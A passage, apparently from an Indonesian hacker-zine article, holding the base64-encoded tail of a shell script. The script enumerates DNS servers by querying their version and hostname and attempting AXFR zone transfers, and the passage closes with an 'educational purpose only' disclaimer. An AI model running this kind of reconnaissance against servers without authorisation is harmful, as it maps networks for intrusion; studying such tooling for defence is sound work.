dGA7CglITj1gZGlnIEAiJFVNSSIgLWMgQ0ggLXQgdHh0IGhvc3RuYW1lLmJp
bmQgK3Nob3J0YDsKCVhSPWBkaWcgQCIkVU1JIiBBWEZSICQxYDsKZWNobyAi
Cj09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09
PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PQpbK10g
RW51bWVyYXRpbmcgJFVNSSBzZXJ2ZXIuLi4KWytdIE5TIHNlcnZlciB2ZXJz
aW9uICAgICAgIDogJFZSIApbK10gTlMgc2VydmVyIGhvc3RuYW1lICAgICAg
OiAkSE4gClsrXSBRdWVyeWluZyAkVU1JIHNlcnZlciAgICA6ICRYUgoiCnNs
ZWVwIDM7CmRvbmUK
====
-----[ Disclaimer
WARNING!!! For Educational Purpose ONLY!!!
-----[ E0F
Syarat dan ketentuan berlaku sebagai berikut :
* Klo jawabannya ada di google atau di manual "man" berarti gua ga perlu jawab.
** Gua terlahir bukan buat ngajarin elu.